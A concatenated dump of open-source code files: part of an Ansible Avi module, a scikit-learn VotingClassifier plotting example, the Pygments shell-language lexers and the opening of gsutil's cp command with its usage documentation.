        query_host_fail=dict(type='int',),
        se_create_timeout=dict(type='int',),
        se_failover_attempt_interval=dict(type='int',),
        se_offline_del=dict(type='int',),
        se_vnic_cooldown=dict(type='int',),
        secure_channel_cleanup_timeout=dict(type='int',),
        secure_channel_controller_token_timeout=dict(type='int',),
        secure_channel_se_token_timeout=dict(type='int',),
        seupgrade_fabric_pool_size=dict(type='int',),
        seupgrade_segroup_min_dead_timeout=dict(type='int',),
        ssl_certificate_expiry_warning_days=dict(type='list',),
        unresponsive_se_reboot=dict(type='int',),
        upgrade_dns_ttl=dict(type='int',),
        upgrade_lease_time=dict(type='int',),
        url=dict(type='str',),
        uuid=dict(type='str',),
        vnic_op_fail_time=dict(type='int',),
        vs_apic_scaleout_timeout=dict(type='int',),
        vs_awaiting_se_timeout=dict(type='int',),
        vs_key_rotate_period=dict(type='int',),
        vs_se_bootup_fail=dict(type='int',),
        vs_se_create_fail=dict(type='int',),
        vs_se_ping_fail=dict(type='int',),
        vs_se_vnic_fail=dict(type='int',),
        vs_se_vnic_ip_fail=dict(type='int',),
        warmstart_se_reconnect_wait_time=dict(type='int',),
    )
    # Add the common Avi connection options (controller, username, ...).
    argument_specs.update(avi_common_argument_spec())
    module = AnsibleModule(
        argument_spec=argument_specs, supports_check_mode=True)
    if not HAS_AVI:
        return module.fail_json(msg=(
            'Avi python API SDK (avisdk>=17.1) is not installed. '
            'For more details visit https://github.com/avinetworks/sdk.'))
    # The set names fields that must stay scrubbed in returned facts.
    return avi_ansible_api(module, 'controllerproperties',
                           set(['portal_token']))
if __name__ == '__main__':
    # Invoked directly by Ansible's module runner.
    main()
| gpl-3.0 |
hdmetor/scikit-learn | examples/ensemble/plot_voting_probas.py | 316 | 2824 | """
===========================================================
Plot class probabilities calculated by the VotingClassifier
===========================================================
Plot the class probabilities of the first sample in a toy dataset
predicted by three different classifiers and averaged by the
`VotingClassifier`.
First, three exemplary classifiers are initialized (`LogisticRegression`,
`GaussianNB`, and `RandomForestClassifier`) and used to initialize a
soft-voting `VotingClassifier` with weights `[1, 1, 5]`, which means that
the predicted probabilities of the `RandomForestClassifier` count 5 times
as much as the weights of the other classifiers when the averaged probability
is calculated.
To visualize the probability weighting, we fit each classifier on the training
set and plot the predicted class probabilities for the first sample in this
example dataset.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import VotingClassifier
clf1 = LogisticRegression(random_state=123)
clf2 = RandomForestClassifier(random_state=123)
clf3 = GaussianNB()
# Tiny 2-class toy dataset: four 2-D points, two per class.
X = np.array([[-1.0, -1.0], [-1.2, -1.4], [-3.4, -2.2], [1.1, 1.2]])
y = np.array([1, 1, 2, 2])

# Soft voting averages predicted probabilities; the forest is weighted 5x.
eclf = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('gnb', clf3)],
                        voting='soft',
                        weights=[1, 1, 5])

# predict class probabilities for all classifiers
probas = [c.fit(X, y).predict_proba(X) for c in (clf1, clf2, clf3, eclf)]

# get class probabilities for the first sample in the dataset
class1_1 = [pr[0, 0] for pr in probas]
class2_1 = [pr[0, 1] for pr in probas]

# plotting
N = 4  # number of groups
ind = np.arange(N)  # group positions
width = 0.35  # bar width
fig, ax = plt.subplots()

# bars for classifier 1-3
p1 = ax.bar(ind, np.hstack(([class1_1[:-1], [0]])), width, color='green')
p2 = ax.bar(ind + width, np.hstack(([class2_1[:-1], [0]])), width, color='lightgreen')

# bars for VotingClassifier (last group only, highlighted in blue)
p3 = ax.bar(ind, [0, 0, 0, class1_1[-1]], width, color='blue')
p4 = ax.bar(ind + width, [0, 0, 0, class2_1[-1]], width, color='steelblue')

# plot annotations
plt.axvline(2.8, color='k', linestyle='dashed')
ax.set_xticks(ind + width)
ax.set_xticklabels(['LogisticRegression\nweight 1',
                    'GaussianNB\nweight 1',
                    'RandomForestClassifier\nweight 5',
                    'VotingClassifier\n(average probabilities)'],
                   rotation=40,
                   ha='right')
plt.ylim([0, 1])
plt.title('Class probabilities for sample 1 by different classifiers')
plt.legend([p1[0], p2[0]], ['class 1', 'class 2'], loc='upper left')
plt.show()
| bsd-3-clause |
ego008/ijd8 | bae/pygments/lexers/shell.py | 71 | 14782 | # -*- coding: utf-8 -*-
"""
pygments.lexers.shell
~~~~~~~~~~~~~~~~~~~~~
Lexers for various shells.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import Lexer, RegexLexer, do_insertions, bygroups, include
from pygments.token import Punctuation, \
Text, Comment, Operator, Keyword, Name, String, Number, Generic
from pygments.util import shebang_matches
__all__ = ['BashLexer', 'BashSessionLexer', 'TcshLexer', 'BatchLexer',
'PowerShellLexer', 'ShellSessionLexer']
# Matches one input line at a time, including its trailing newline; used by
# the session lexers below to walk the input line-by-line.
line_re = re.compile('.*?\n')
class BashLexer(RegexLexer):
    """
    Lexer for (ba|k|)sh shell scripts.
    *New in Pygments 0.6.*
    """
    name = 'Bash'
    aliases = ['bash', 'sh', 'ksh']
    filenames = ['*.sh', '*.ksh', '*.bash', '*.ebuild', '*.eclass',
                 '.bashrc', 'bashrc', '.bash_*', 'bash_*']
    mimetypes = ['application/x-sh', 'application/x-shellscript']
    # State machine: 'root' tries the keyword/builtin rules ('basic') first,
    # then pushes dedicated states for $((..)), $(..), ${..} and `..`
    # constructs, and finally falls back to 'data' (strings and bare words).
    # Rule order within each state is significant.
    tokens = {
        'root': [
            include('basic'),
            (r'\$\(\(', Keyword, 'math'),     # arithmetic expansion
            (r'\$\(', Keyword, 'paren'),      # command substitution
            (r'\${#?', Keyword, 'curly'),     # parameter expansion
            (r'`', String.Backtick, 'backticks'),
            include('data'),
        ],
        'basic': [
            # Flow-control keywords.
            (r'\b(if|fi|else|while|do|done|for|then|return|function|case|'
             r'select|continue|until|esac|elif)\s*\b',
             Keyword),
            # Shell builtins; the (?!\.) lookahead rejects a trailing dot.
            (r'\b(alias|bg|bind|break|builtin|caller|cd|command|compgen|'
             r'complete|declare|dirs|disown|echo|enable|eval|exec|exit|'
             r'export|false|fc|fg|getopts|hash|help|history|jobs|kill|let|'
             r'local|logout|popd|printf|pushd|pwd|read|readonly|set|shift|'
             r'shopt|source|suspend|test|time|times|trap|true|type|typeset|'
             r'ulimit|umask|unalias|unset|wait)\s*\b(?!\.)',
             Name.Builtin),
            (r'#.*\n', Comment),
            (r'\\[\w\W]', String.Escape),  # backslash escape of any char
            # Variable assignment: name, optional space, '='.
            (r'(\b\w+)(\s*)(=)', bygroups(Name.Variable, Text, Operator)),
            (r'[\[\]{}()=]', Operator),
            (r'<<<', Operator),  # here-string
            (r'<<-?\s*(\'?)\\?(\w+)[\w\W]+?\2', String),  # heredoc body
            (r'&&|\|\|', Operator),
        ],
        'data': [
            # Double/single quoted strings (optionally $-prefixed).
            (r'(?s)\$?"(\\\\|\\[0-7]+|\\.|[^"\\])*"', String.Double),
            (r"(?s)\$?'(\\\\|\\[0-7]+|\\.|[^'\\])*'", String.Single),
            (r';', Text),
            (r'\s+', Text),
            (r'[^=\s\[\]{}()$"\'`\\<]+', Text),
            (r'\d+(?= |\Z)', Number),
            (r'\$#?(\w+|.)', Name.Variable),  # $var, $#, $?, $1, ...
            (r'<', Text),
        ],
        'curly': [
            # Inside ${...}: '}' pops back to the enclosing state.
            (r'}', Keyword, '#pop'),
            (r':-', Keyword),
            (r'[a-zA-Z0-9_]+', Name.Variable),
            (r'[^}:"\'`$]+', Punctuation),
            (r':', Punctuation),
            include('root'),
        ],
        'paren': [
            (r'\)', Keyword, '#pop'),
            include('root'),
        ],
        'math': [
            (r'\)\)', Keyword, '#pop'),
            (r'[-+*/%^|&]|\*\*|\|\|', Operator),
            (r'\d+', Number),
            include('root'),
        ],
        'backticks': [
            (r'`', String.Backtick, '#pop'),
            include('root'),
        ],
    }
    # Pygments' analyse_text hook (called without self, per convention):
    # claim files whose shebang mentions bash/zsh/sh.
    def analyse_text(text):
        return shebang_matches(text, r'(ba|z|)sh')
class BashSessionLexer(Lexer):
    """
    Lexer for simplistic shell sessions.
    *New in Pygments 1.1.*
    """
    name = 'Bash Session'
    aliases = ['console']
    filenames = ['*.sh-session']
    mimetypes = ['application/x-shell-session']
    def get_tokens_unprocessed(self, text):
        """Yield (index, token, value) triples for a shell transcript.

        Prompt lines are split into a Generic.Prompt token plus command
        text; the accumulated command text is lexed with BashLexer and
        re-interleaved via do_insertions.  Non-prompt lines are emitted
        as Generic.Output.
        """
        bashlexer = BashLexer(**self.options)
        pos = 0            # absolute offset of the first buffered command line
        curcode = ''       # accumulated command text awaiting bash lexing
        insertions = []    # pending (offset, [(0, token, value)]) prompt tokens
        for match in line_re.finditer(text):
            line = match.group()
            # Group 1: the prompt (optionally "(venv)"-prefixed, user@host
            # forms, ending in $, # or %); group 2: the command text.
            m = re.match(r'^((?:\(\S+\))?(?:|sh\S*?|\w+\S+[@:]\S+(?:\s+\S+)'
                         r'?|\[\S+[@:][^\n]+\].+)[$#%])(.*\n?)' , line)
            if m:
                # To support output lexers (say diff output), the output
                # needs to be broken by prompts whenever the output lexer
                # changes.
                if not insertions:
                    pos = match.start()
                insertions.append((len(curcode),
                                   [(0, Generic.Prompt, m.group(1))]))
                curcode += m.group(2)
            elif line.startswith('>'):
                # Continuation line: '>' is the secondary prompt.
                insertions.append((len(curcode),
                                   [(0, Generic.Prompt, line[:1])]))
                curcode += line[1:]
            else:
                # Output line: flush any buffered command first.
                if insertions:
                    toks = bashlexer.get_tokens_unprocessed(curcode)
                    for i, t, v in do_insertions(insertions, toks):
                        yield pos+i, t, v
                yield match.start(), Generic.Output, line
                insertions = []
                curcode = ''
        # Flush a trailing command that was not followed by output.
        if insertions:
            for i, t, v in do_insertions(insertions,
                                         bashlexer.get_tokens_unprocessed(curcode)):
                yield pos+i, t, v
class ShellSessionLexer(Lexer):
    """
    Lexer for shell sessions that works with different command prompts.
    *New in Pygments 1.6.*
    """
    name = 'Shell Session'
    aliases = ['shell-session']
    filenames = ['*.shell-session']
    mimetypes = ['application/x-sh-session']
    def get_tokens_unprocessed(self, text):
        """Yield (index, token, value) triples for a shell transcript.

        Same structure as BashSessionLexer.get_tokens_unprocessed, but
        with a simpler "user@host ...$" prompt regex and no
        continuation-line ('>') handling.
        """
        bashlexer = BashLexer(**self.options)
        pos = 0            # absolute offset of the first buffered command line
        curcode = ''       # accumulated command text awaiting bash lexing
        insertions = []    # pending (offset, [(0, token, value)]) prompt tokens
        for match in line_re.finditer(text):
            line = match.group()
            # Group 1: "user@host ...$/#/%" prompt; group 2: command text.
            m = re.match(r'^((?:\[?\S+@[^$#%]+)[$#%])(.*\n?)', line)
            if m:
                # To support output lexers (say diff output), the output
                # needs to be broken by prompts whenever the output lexer
                # changes.
                if not insertions:
                    pos = match.start()
                insertions.append((len(curcode),
                                   [(0, Generic.Prompt, m.group(1))]))
                curcode += m.group(2)
            else:
                # Output line: flush any buffered command first.
                if insertions:
                    toks = bashlexer.get_tokens_unprocessed(curcode)
                    for i, t, v in do_insertions(insertions, toks):
                        yield pos+i, t, v
                yield match.start(), Generic.Output, line
                insertions = []
                curcode = ''
        # Flush a trailing command that was not followed by output.
        if insertions:
            for i, t, v in do_insertions(insertions,
                                         bashlexer.get_tokens_unprocessed(curcode)):
                yield pos+i, t, v
class BatchLexer(RegexLexer):
    """
    Lexer for the DOS/Windows Batch file format.
    *New in Pygments 0.7.*
    """
    name = 'Batchfile'
    aliases = ['bat']
    filenames = ['*.bat', '*.cmd']
    mimetypes = ['application/x-dos-batch']
    flags = re.MULTILINE | re.IGNORECASE
    # Rule order within each state is significant; 'root' handles prompts,
    # variables and keywords, then defers to 'basic' for generic tokens.
    tokens = {
        'root': [
            # Lines can start with @ to prevent echo
            (r'^\s*@', Punctuation),
            (r'^(\s*)(rem\s.*)$', bygroups(Text, Comment)),
            (r'".*?"', String.Double),
            (r"'.*?'", String.Single),
            # If made more specific, make sure you still allow expansions
            # like %~$VAR:zlt
            (r'%%?[~$:\w]+%?', Name.Variable),
            (r'::.*', Comment), # Technically :: only works at BOL
            (r'(set)(\s+)(\w+)', bygroups(Keyword, Text, Name.Variable)),
            (r'(call)(\s+)(:\w+)', bygroups(Keyword, Text, Name.Label)),
            (r'(goto)(\s+)(\w+)', bygroups(Keyword, Text, Name.Label)),
            (r'\b(set|call|echo|on|off|endlocal|for|do|goto|if|pause|'
             r'setlocal|shift|errorlevel|exist|defined|cmdextversion|'
             r'errorlevel|else|cd|md|del|deltree|cls|choice)\b', Keyword),
            (r'\b(equ|neq|lss|leq|gtr|geq)\b', Operator),
            include('basic'),
            (r'.', Text),  # catch-all: any remaining character
        ],
        'echo': [
            # Escapes only valid within echo args?
            (r'\^\^|\^<|\^>|\^\|', String.Escape),
            (r'\n', Text, '#pop'),
            include('basic'),
            (r'[^\'"^]+', Text),
        ],
        'basic': [
            (r'".*?"', String.Double),
            (r"'.*?'", String.Single),
            (r'`.*?`', String.Backtick),
            (r'-?\d+', Number),
            (r',', Punctuation),
            (r'=', Operator),
            (r'/\S+', Name),       # /switch-style options
            (r':\w+', Name.Label), # goto/call labels
            (r'\w:\w+', Text),
            (r'([<>|])(\s*)(\w+)', bygroups(Punctuation, Text, Name)),
        ],
    }
class TcshLexer(RegexLexer):
    """
    Lexer for tcsh scripts.
    *New in Pygments 0.10.*
    """
    name = 'Tcsh'
    aliases = ['tcsh', 'csh']
    filenames = ['*.tcsh', '*.csh']
    mimetypes = ['application/x-csh']
    # Same state layout as BashLexer, minus the $((...)) 'math' state,
    # which tcsh does not have.  Rule order within each state matters.
    tokens = {
        'root': [
            include('basic'),
            (r'\$\(', Keyword, 'paren'),   # command substitution
            (r'\${#?', Keyword, 'curly'),  # parameter expansion
            (r'`', String.Backtick, 'backticks'),
            include('data'),
        ],
        'basic': [
            # Flow-control keywords.
            (r'\b(if|endif|else|while|then|foreach|case|default|'
             r'continue|goto|breaksw|end|switch|endsw)\s*\b',
             Keyword),
            # Builtins.  NOTE(review): the alternation contains duplicates
            # (popd, pushd, shift, source, suspend each appear twice) —
            # harmless for matching, but could be deduplicated upstream.
            (r'\b(alias|alloc|bg|bindkey|break|builtins|bye|caller|cd|chdir|'
             r'complete|dirs|echo|echotc|eval|exec|exit|fg|filetest|getxvers|'
             r'glob|getspath|hashstat|history|hup|inlib|jobs|kill|'
             r'limit|log|login|logout|ls-F|migrate|newgrp|nice|nohup|notify|'
             r'onintr|popd|printenv|pushd|rehash|repeat|rootnode|popd|pushd|'
             r'set|shift|sched|setenv|setpath|settc|setty|setxvers|shift|'
             r'source|stop|suspend|source|suspend|telltc|time|'
             r'umask|unalias|uncomplete|unhash|universe|unlimit|unset|unsetenv|'
             r'ver|wait|warp|watchlog|where|which)\s*\b',
             Name.Builtin),
            (r'#.*\n', Comment),
            (r'\\[\w\W]', String.Escape),  # backslash escape of any char
            (r'(\b\w+)(\s*)(=)', bygroups(Name.Variable, Text, Operator)),
            (r'[\[\]{}()=]+', Operator),
            (r'<<\s*(\'?)\\?(\w+)[\w\W]+?\2', String),  # heredoc body
        ],
        'data': [
            (r'(?s)"(\\\\|\\[0-7]+|\\.|[^"\\])*"', String.Double),
            (r"(?s)'(\\\\|\\[0-7]+|\\.|[^'\\])*'", String.Single),
            (r'\s+', Text),
            (r'[^=\s\[\]{}()$"\'`\\]+', Text),
            (r'\d+(?= |\Z)', Number),
            (r'\$#?(\w+|.)', Name.Variable),  # $var, $#, $1, ...
        ],
        'curly': [
            (r'}', Keyword, '#pop'),
            (r':-', Keyword),
            (r'[a-zA-Z0-9_]+', Name.Variable),
            (r'[^}:"\'`$]+', Punctuation),
            (r':', Punctuation),
            include('root'),
        ],
        'paren': [
            (r'\)', Keyword, '#pop'),
            include('root'),
        ],
        'backticks': [
            (r'`', String.Backtick, '#pop'),
            include('root'),
        ],
    }
class PowerShellLexer(RegexLexer):
    """
    For Windows PowerShell code.
    *New in Pygments 1.5.*
    """
    name = 'PowerShell'
    aliases = ['powershell', 'posh', 'ps1']
    filenames = ['*.ps1']
    mimetypes = ['text/x-powershell']
    flags = re.DOTALL | re.IGNORECASE | re.MULTILINE
    # Word lists interpolated into the token regexes below via '|'.join.
    keywords = (
        'while validateset validaterange validatepattern validatelength '
        'validatecount until trap switch return ref process param parameter in '
        'if global: function foreach for finally filter end elseif else '
        'dynamicparam do default continue cmdletbinding break begin alias \\? '
        '% #script #private #local #global mandatory parametersetname position '
        'valuefrompipeline valuefrompipelinebypropertyname '
        'valuefromremainingarguments helpmessage try catch').split()
    operators = (
        'and as band bnot bor bxor casesensitive ccontains ceq cge cgt cle '
        'clike clt cmatch cne cnotcontains cnotlike cnotmatch contains '
        'creplace eq exact f file ge gt icontains ieq ige igt ile ilike ilt '
        'imatch ine inotcontains inotlike inotmatch ireplace is isnot le like '
        'lt match ne not notcontains notlike notmatch or regex replace '
        'wildcard').split()
    verbs = (
        'write where wait use update unregister undo trace test tee take '
        'suspend stop start split sort skip show set send select scroll resume '
        'restore restart resolve resize reset rename remove register receive '
        'read push pop ping out new move measure limit join invoke import '
        'group get format foreach export expand exit enter enable disconnect '
        'disable debug cxnew copy convertto convertfrom convert connect '
        'complete compare clear checkpoint aggregate add').split()
    # Section names recognized inside comment-based help (.SYNOPSIS etc.).
    commenthelp = (
        'component description example externalhelp forwardhelpcategory '
        'forwardhelptargetname functionality inputs link '
        'notes outputs parameter remotehelprunspace role synopsis').split()
    tokens = {
        'root': [
            (r'\s+', Text),
            # Single-line comment-based help: "# .SYNOPSIS ..." etc.
            (r'^(\s*#[#\s]*)(\.(?:%s))([^\n]*$)' % '|'.join(commenthelp),
             bygroups(Comment, String.Doc, Comment)),
            (r'#[^\n]*?$', Comment),
            # Block comment <# ... #>.  NOTE(review): '(<|<)' contains two
            # identical alternatives — likely an '&lt;' entity that was
            # HTML-unescaped upstream; verify against the pygments source.
            (r'(<|<)#', Comment.Multiline, 'multline'),
            (r'@"\n.*?\n"@', String.Heredoc),
            (r"@'\n.*?\n'@", String.Heredoc),
            # escaped syntax
            (r'`[\'"$@-]', Punctuation),
            (r'"', String.Double, 'string'),
            (r"'([^']|'')*'", String.Single),  # '' is an escaped quote
            (r'(\$|@@|@)((global|script|private|env):)?[a-z0-9_]+',
             Name.Variable),
            (r'(%s)\b' % '|'.join(keywords), Keyword),
            (r'-(%s)\b' % '|'.join(operators), Operator),
            (r'(%s)-[a-z_][a-z0-9_]*\b' % '|'.join(verbs), Name.Builtin),
            (r'\[[a-z_\[][a-z0-9_. `,\[\]]*\]', Name.Constant), # .net [type]s
            (r'-[a-z_][a-z0-9_]*', Name),
            (r'\w+', Name),
            (r'[.,{}\[\]$()=+*/\\&%!~?^`|<>-]', Punctuation),
        ],
        'multline': [
            (r'[^#&.]+', Comment.Multiline),
            # End of block comment.  NOTE(review): same duplicated
            # alternative as the opener — presumably once '&gt;'.
            (r'#(>|>)', Comment.Multiline, '#pop'),
            (r'\.(%s)' % '|'.join(commenthelp), String.Doc),
            (r'[#&.]', Comment.Multiline),
        ],
        'string': [
            (r'[^$`"]+', String.Double),
            (r'\$\(', String.Interpol, 'interpol'),  # "$(subexpr)"
            (r'`"|""', String.Double),
            (r'[`$]', String.Double),
            (r'"', String.Double, '#pop'),
        ],
        'interpol': [
            (r'[^$)]+', String.Interpol),
            (r'\$\(', String.Interpol, '#push'),  # nested subexpression
            (r'\)', String.Interpol, '#pop'),
        ]
    }
| mit |
KaranToor/MA450 | google-cloud-sdk/platform/gsutil/gslib/commands/cp.py | 3 | 56552 | # -*- coding: utf-8 -*-
# Copyright 2011 Google Inc. All Rights Reserved.
# Copyright 2011, Nexenta Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of Unix-like cp command for cloud storage providers."""
from __future__ import absolute_import
import logging
import os
import time
import traceback
from apitools.base.py import encoding
from gslib import copy_helper
from gslib.cat_helper import CatHelper
from gslib.command import Command
from gslib.command_argument import CommandArgument
from gslib.commands.compose import MAX_COMPONENT_COUNT
from gslib.copy_helper import CreateCopyHelperOpts
from gslib.copy_helper import GetSourceFieldsNeededForCopy
from gslib.copy_helper import GZIP_ALL_FILES
from gslib.copy_helper import ItemExistsError
from gslib.copy_helper import Manifest
from gslib.copy_helper import PARALLEL_UPLOAD_TEMP_NAMESPACE
from gslib.copy_helper import SkipUnsupportedObjectError
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.metrics import LogPerformanceSummaryParams
from gslib.name_expansion import NameExpansionIterator
from gslib.name_expansion import SeekAheadNameExpansionIterator
from gslib.name_expansion import SourceUrlTypeIterator
from gslib.posix_util import ConvertModeToBase8
from gslib.posix_util import DeserializeFileAttributesFromObjectMetadata
from gslib.posix_util import InitializeUserGroups
from gslib.posix_util import POSIXAttributes
from gslib.posix_util import SerializeFileAttributesToObjectMetadata
from gslib.posix_util import ValidateFilePermissionAccess
from gslib.storage_url import ContainsWildcard
from gslib.third_party.storage_apitools import storage_v1_messages as apitools_messages
from gslib.util import CalculateThroughput
from gslib.util import CreateLock
from gslib.util import DEBUGLEVEL_DUMP_REQUESTS
from gslib.util import GetCloudApiInstance
from gslib.util import IsCloudSubdirPlaceholder
from gslib.util import MakeHumanReadable
from gslib.util import NO_MAX
from gslib.util import NormalizeStorageClass
from gslib.util import RemoveCRLFFromString
from gslib.util import StdinIterator
_SYNOPSIS = """
gsutil cp [OPTION]... src_url dst_url
gsutil cp [OPTION]... src_url... dst_url
gsutil cp [OPTION]... -I dst_url
"""
_SYNOPSIS_TEXT = """
<B>SYNOPSIS</B>
""" + _SYNOPSIS
_DESCRIPTION_TEXT = """
<B>DESCRIPTION</B>
The gsutil cp command allows you to copy data between your local file
system and the cloud, copy data within the cloud, and copy data between
cloud storage providers. For example, to copy all text files from the
local directory to a bucket you could do:
gsutil cp *.txt gs://my-bucket
Similarly, you can download text files from a bucket by doing:
gsutil cp gs://my-bucket/*.txt .
If you want to copy an entire directory tree you need to use the -r option:
gsutil cp -r dir gs://my-bucket
If you have a large number of files to transfer you might want to use the
gsutil -m option, to perform a parallel (multi-threaded/multi-processing)
copy:
gsutil -m cp -r dir gs://my-bucket
You can pass a list of URLs (one per line) to copy on stdin instead of as
command line arguments by using the -I option. This allows you to use gsutil
in a pipeline to upload or download files / objects as generated by a program,
such as:
some_program | gsutil -m cp -I gs://my-bucket
or:
some_program | gsutil -m cp -I ./download_dir
The contents of stdin can name files, cloud URLs, and wildcards of files
and cloud URLs.
"""
_NAME_CONSTRUCTION_TEXT = """
<B>HOW NAMES ARE CONSTRUCTED</B>
The gsutil cp command strives to name objects in a way consistent with how
Linux cp works, which causes names to be constructed in varying ways depending
on whether you're performing a recursive directory copy or copying
individually named objects; and whether you're copying to an existing or
non-existent directory.
When performing recursive directory copies, object names are constructed that
mirror the source directory structure starting at the point of recursive
processing. For example, if dir1/dir2 contains the file a/b/c then the
command:
gsutil cp -r dir1/dir2 gs://my-bucket
will create the object gs://my-bucket/dir2/a/b/c.
In contrast, copying individually named files will result in objects named by
the final path component of the source files. For example, again assuming
dir1/dir2 contains a/b/c, the command:
gsutil cp dir1/dir2/** gs://my-bucket
will create the object gs://my-bucket/c.
The same rules apply for downloads: recursive copies of buckets and
bucket subdirectories produce a mirrored filename structure, while copying
individually (or wildcard) named objects produce flatly named files.
Note that in the above example the '**' wildcard matches all names
anywhere under dir. The wildcard '*' will match names just one level deep. For
more details see "gsutil help wildcards".
There's an additional wrinkle when working with subdirectories: the resulting
names depend on whether the destination subdirectory exists. For example,
if gs://my-bucket/subdir exists as a subdirectory, the command:
gsutil cp -r dir1/dir2 gs://my-bucket/subdir
will create the object gs://my-bucket/subdir/dir2/a/b/c. In contrast, if
gs://my-bucket/subdir does not exist, this same gsutil cp command will create
the object gs://my-bucket/subdir/a/b/c.
Note: If you use the
`Google Cloud Platform Console <https://console.cloud.google.com>`_
to create folders, it does so by creating a "placeholder" object that ends
with a "/" character. gsutil skips these objects when downloading from the
cloud to the local file system, because attempting to create a file that
ends with a "/" is not allowed on Linux and MacOS. Because of this, it is
recommended that you not create objects that end with "/" (unless you don't
need to be able to download such objects using gsutil).
"""
_SUBDIRECTORIES_TEXT = """
<B>COPYING TO/FROM SUBDIRECTORIES; DISTRIBUTING TRANSFERS ACROSS MACHINES</B>
You can use gsutil to copy to and from subdirectories by using a command
like:
gsutil cp -r dir gs://my-bucket/data
This will cause dir and all of its files and nested subdirectories to be
copied under the specified destination, resulting in objects with names like
gs://my-bucket/data/dir/a/b/c. Similarly you can download from bucket
subdirectories by using a command like:
gsutil cp -r gs://my-bucket/data dir
This will cause everything nested under gs://my-bucket/data to be downloaded
into dir, resulting in files with names like dir/data/a/b/c.
Copying subdirectories is useful if you want to add data to an existing
bucket directory structure over time. It's also useful if you want
to parallelize uploads and downloads across multiple machines (potentially
reducing overall transfer time compared with simply running gsutil -m
cp on one machine). For example, if your bucket contains this structure:
gs://my-bucket/data/result_set_01/
gs://my-bucket/data/result_set_02/
...
gs://my-bucket/data/result_set_99/
you could perform concurrent downloads across 3 machines by running these
commands on each machine, respectively:
gsutil -m cp -r gs://my-bucket/data/result_set_[0-3]* dir
gsutil -m cp -r gs://my-bucket/data/result_set_[4-6]* dir
gsutil -m cp -r gs://my-bucket/data/result_set_[7-9]* dir
Note that dir could be a local directory on each machine, or it could be a
directory mounted off of a shared file server; whether the latter performs
acceptably will depend on a number of factors, so we recommend experimenting
to find out what works best for your computing environment.
"""
_COPY_IN_CLOUD_TEXT = """
<B>COPYING IN THE CLOUD AND METADATA PRESERVATION</B>
If both the source and destination URL are cloud URLs from the same
provider, gsutil copies data "in the cloud" (i.e., without downloading
to and uploading from the machine where you run gsutil). In addition to
the performance and cost advantages of doing this, copying in the cloud
preserves metadata (like Content-Type and Cache-Control). In contrast,
when you download data from the cloud it ends up in a file, which has
no associated metadata. Thus, unless you have some way to hold on to
or re-create that metadata, downloading to a file will not retain the
metadata.
Copies spanning locations and/or storage classes cause data to be rewritten
in the cloud, which may take some time (but still will be faster than
downloading and re-uploading). Such operations can be resumed with the same
command if they are interrupted, so long as the command parameters are
identical.
Note that by default, the gsutil cp command does not copy the object
ACL to the new object, and instead will use the default bucket ACL (see
"gsutil help defacl"). You can override this behavior with the -p
option (see OPTIONS below).
One additional note about copying in the cloud: If the destination bucket has
versioning enabled, by default gsutil cp will copy only live versions of the
source object(s). For example:
gsutil cp gs://bucket1/obj gs://bucket2
will cause only the single live version of gs://bucket1/obj to be copied to
gs://bucket2, even if there are archived versions of gs://bucket1/obj. To also
copy archived versions, use the -A flag:
gsutil cp -A gs://bucket1/obj gs://bucket2
The gsutil -m flag is disallowed when using the cp -A flag, to ensure that
version ordering is preserved.
"""
_CHECKSUM_VALIDATION_TEXT = """
<B>CHECKSUM VALIDATION</B>
At the end of every upload or download the gsutil cp command validates that
the checksum it computes for the source file/object matches the checksum
the service computes. If the checksums do not match, gsutil will delete the
corrupted object and print a warning message. This very rarely happens, but
if it does, please contact gs-team@google.com.
If you know the MD5 of a file before uploading you can specify it in the
Content-MD5 header, which will cause the cloud storage service to reject the
upload if the MD5 doesn't match the value computed by the service. For
example:
% gsutil hash obj
Hashing obj:
Hashes [base64] for obj:
Hash (crc32c): lIMoIw==
Hash (md5): VgyllJgiiaRAbyUUIqDMmw==
% gsutil -h Content-MD5:VgyllJgiiaRAbyUUIqDMmw== cp obj gs://your-bucket/obj
Copying file://obj [Content-Type=text/plain]...
Uploading gs://your-bucket/obj: 182 b/182 B
If the checksum didn't match the service would instead reject the upload and
gsutil would print a message like:
BadRequestException: 400 Provided MD5 hash "VgyllJgiiaRAbyUUIqDMmw=="
doesn't match calculated MD5 hash "7gyllJgiiaRAbyUUIqDMmw==".
Even if you don't do this gsutil will delete the object if the computed
checksum mismatches, but specifying the Content-MD5 header has several
advantages:
1. It prevents the corrupted object from becoming visible at all, whereas
otherwise it would be visible for 1-3 seconds before gsutil deletes it.
2. If an object already exists with the given name, specifying the
Content-MD5 header will cause the existing object never to be replaced,
whereas otherwise it would be replaced by the corrupted object and then
deleted a few seconds later.
3. It will definitively prevent the corrupted object from being left in
the cloud, whereas the gsutil approach of deleting after the upload
completes could fail if (for example) the gsutil process gets ^C'd
between upload and deletion request.
4. It supports a customer-to-service integrity check handoff. For example,
if you have a content production pipeline that generates data to be
uploaded to the cloud along with checksums of that data, specifying the
MD5 computed by your content pipeline when you run gsutil cp will ensure
that the checksums match all the way through the process (e.g., detecting
if data gets corrupted on your local disk between the time it was written
by your content pipeline and the time it was uploaded to GCS).
Note: The Content-MD5 header is ignored for composite objects, because such
objects only have a CRC32C checksum.
"""
_RETRY_HANDLING_TEXT = """
<B>RETRY HANDLING</B>
The cp command will retry when failures occur, but if enough failures happen
during a particular copy or delete operation the cp command will skip that
object and move on. At the end of the copy run if any failures were not
successfully retried, the cp command will report the count of failures, and
exit with non-zero status.
Note that there are cases where retrying will never succeed, such as if you
don't have write permission to the destination bucket or if the destination
path for some objects is longer than the maximum allowed length.
For more details about gsutil's retry handling, please see
"gsutil help retries".
"""
_RESUMABLE_TRANSFERS_TEXT = """
<B>RESUMABLE TRANSFERS</B>
gsutil automatically performs a resumable upload whenever you use the cp
command to upload an object that is larger than 8 MiB. You do not need to
